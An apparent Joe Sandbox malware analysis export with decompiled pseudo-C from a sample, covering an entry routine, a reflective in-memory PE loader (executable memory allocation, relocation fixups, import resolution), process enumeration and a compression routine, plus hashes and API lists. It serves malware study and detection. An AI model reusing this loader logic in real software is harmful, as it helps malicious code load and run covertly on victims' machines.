Opcode Fuzzy Hash: d14873079b3de8e38d15de762986f496df5531c4e30a540330b0d907572d2078
Instruction Fuzzy Hash: CF21C371A04365ABEB319BA59C0DFDE3BBCEF45715F040091FA09EF2C1CA309A458B61

Uniqueness

Uniqueness Score: -1.00%

Function 013E9EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E013E1B10(E013E1BE0(0xd22e2014), 0x13e11f0, 9, 0x3966646c, 0x13ec1f0);
				E013E1B10(E013E1BE0(0x8f7ee672), 0x13e10d0, 0x48, 0x6677a1d2, 0x13ec0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E013E15B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x013e9efe
0x013e9f23
0x013e9f39
0x013e9f3f
0x013e9f43
0x013e9f4d
0x013e9f60
0x013e9f66
0x013e9f66
0x013e9f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 013E9F32
RtlAllocateHeap.NTDLL(00000000), ref: 013E9F39
memset.NTDLL ref: 013E9F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E9F59
RtlFreeHeap.NTDLL(00000000), ref: 013E9F60

Part of subcall function 013E15B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013E15C9
Part of subcall function 013E15B0: _snwprintf.NTDLL ref: 013E1602
Part of subcall function 013E15B0: GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E160E
Part of subcall function 013E15B0: HeapFree.KERNEL32(00000000), ref: 013E1615
Part of subcall function 013E15B0: _snwprintf.NTDLL ref: 013E1641
Part of subcall function 013E15B0: GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E164D
Part of subcall function 013E15B0: HeapFree.KERNEL32(00000000), ref: 013E1654
Part of subcall function 013E15B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 013E1667
Part of subcall function 013E15B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 013E167E
Part of subcall function 013E15B0: CloseHandle.KERNEL32(00000000), ref: 013E168B

ExitProcess.KERNEL32 ref: 013E9F6D

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: 69ccd59e56992382f7223519f6d39778663b81fd5cbe45a0f6cbd1908bb4383b
Instruction ID: 9f934831e4153cf448b7fd9e4cd25e3742af3f11a8160324543448cac3b841ba
Opcode Fuzzy Hash: 69ccd59e56992382f7223519f6d39778663b81fd5cbe45a0f6cbd1908bb4383b
Instruction Fuzzy Hash: C9F06230B803226BF97033B96C2EB0F39D95F50B4AF105414F506BE2CAEE71C90047A9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013E1F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E1F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x013e1f47
0x013e1f4a
0x013e1f4f
0x013e2105
0x013e210b
0x013e1f63
0x013e1f67
0x013e1f69
0x013e1f72
0x013e2103
0x00000000
0x013e1f87
0x013e1f98
0x013e1f9c
0x013e1fa7
0x013e1fb1
0x013e1fb4
0x013e1fba
0x013e1fc3
0x013e1fc6
0x013e1fcb
0x013e1fd0
0x013e1fd0
0x013e1fd9
0x013e1fe7
0x013e1fed
0x013e1ff0
0x013e1ff3
0x013e1ff8
0x013e1ff8
0x013e2006
0x013e2008
0x013e2011
0x013e2013
0x013e2018
0x013e2020
0x013e2023
0x013e2026
0x013e2028
0x013e202b
0x013e2030
0x013e2032
0x013e2032
0x013e2042
0x013e2049
0x013e204e
0x013e204e
0x013e2051
0x013e2054
0x013e2058
0x013e2058
0x013e205b
0x013e205d
0x013e2062
0x013e2062
0x013e2065
0x013e206d
0x013e2080
0x013e2083
0x013e2086
0x013e208b
0x013e2090
0x013e2099
0x013e209b
0x013e20a0
0x00000000
0x00000000
0x013e20a7
0x013e20a9
0x013e20ab
0x013e20ad
0x013e20af
0x013e20da
0x013e20dd
0x013e20e0
0x013e20e3
0x013e20e8
0x00000000
0x013e20ea
0x013e20f2
0x013e20f2
0x013e20b1
0x00000000
0x013e20b1
0x013e20b1
0x013e20bb
0x013e20b3
0x013e20b3
0x013e20b3
0x013e20bf
0x013e20c7
0x00000000
0x00000000
0x013e20c9
0x013e20cc
0x013e20cf
0x013e20d1
0x013e20d4
0x013e20d8
0x00000000
0x00000000
0x00000000
0x00000000
0x013e20d8
0x00000000
0x013e20af
0x013e20fb
0x013e2101
0x013e2101
0x013e208b
0x013e206d
0x00000000
0x013e1f9c
0x013e1f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,013E8A23,?,000DBBA0), ref: 013E1F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,013E8F82), ref: 013E1FA7
memcpy.NTDLL(?,?,?), ref: 013E1FE7
LoadLibraryA.KERNEL32(013E8F82), ref: 013E2093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 013E20BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013E20FB

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: 74fef39b2106841cdd4fa27ad244b563f062fd3765eda9352df7b2f819c3d29e
Instruction ID: bca1c4725c6b191b71dcb449f56b404e63f9ff6151a9f561dcb50ea2903d2c12
Opcode Fuzzy Hash: 74fef39b2106841cdd4fa27ad244b563f062fd3765eda9352df7b2f819c3d29e
Instruction Fuzzy Hash: 10515D71A003259FDB30CF59C884B6ABBF9FF44318F184469E946AB282D771EE55CB84

Uniqueness

Uniqueness Score: -1.00%

Function 013E2110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E2110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E013E8B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x013e211f
0x013e2121
0x013e2127
0x013e212c
0x013e212e
0x013e2134
0x013e2140
0x013e2148
0x013e2173
0x00000000
0x013e2174
0x013e2150
0x013e215d
0x00000000
0x013e2150
0x013e217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013E2121
Process32FirstW.KERNEL32(00000000,?), ref: 013E2140
CloseHandle.KERNEL32(00000000,?,?), ref: 013E2174

Part of subcall function 013E8B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,013E215D,0000022C,00000000,?,?), ref: 013E8B47
Part of subcall function 013E8B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,013E215D,0000022C,00000000,?,?), ref: 013E8B75
Part of subcall function 013E8B30: RtlAllocateHeap.NTDLL(00000000,?,013E215D), ref: 013E8B7C
Part of subcall function 013E8B30: lstrcpyW.KERNEL32(00000004,?), ref: 013E8B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 013E2169

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: 7107b02736d020e6db4cc2b313290c909971e3caa64ec6e18997e23b051cb2f7
Instruction ID: fe7a6b9230c2d4935cc4dfb8a24d49150d0bfd68166784afc6b957a9c717f172
Opcode Fuzzy Hash: 7107b02736d020e6db4cc2b313290c909971e3caa64ec6e18997e23b051cb2f7
Instruction Fuzzy Hash: FAF062395013246BE730AAB9AC4CFAF7BECEB4A314F1401A5FE14D61C0E770DA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 013E6E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E013E6E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E013E6A80(_t415);
					} else {
						E013E5B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E013E6C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E013E6A80(_t415);
							_t416 = _t416 + 4;
							E013E6C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x013e6e70
0x013e6e78
0x013e6e7a
0x013e6e7e
0x013e6e8c
0x013e6ea0
0x013e6ea0
0x013e6e8e
0x013e6e94
0x013e6e9e
0x00000000
0x00000000
0x013e6e9e
0x013e6eaa
0x013e6ec7
0x013e6ec7
0x013e6eac
0x013e6eaf
0x013e6ebe
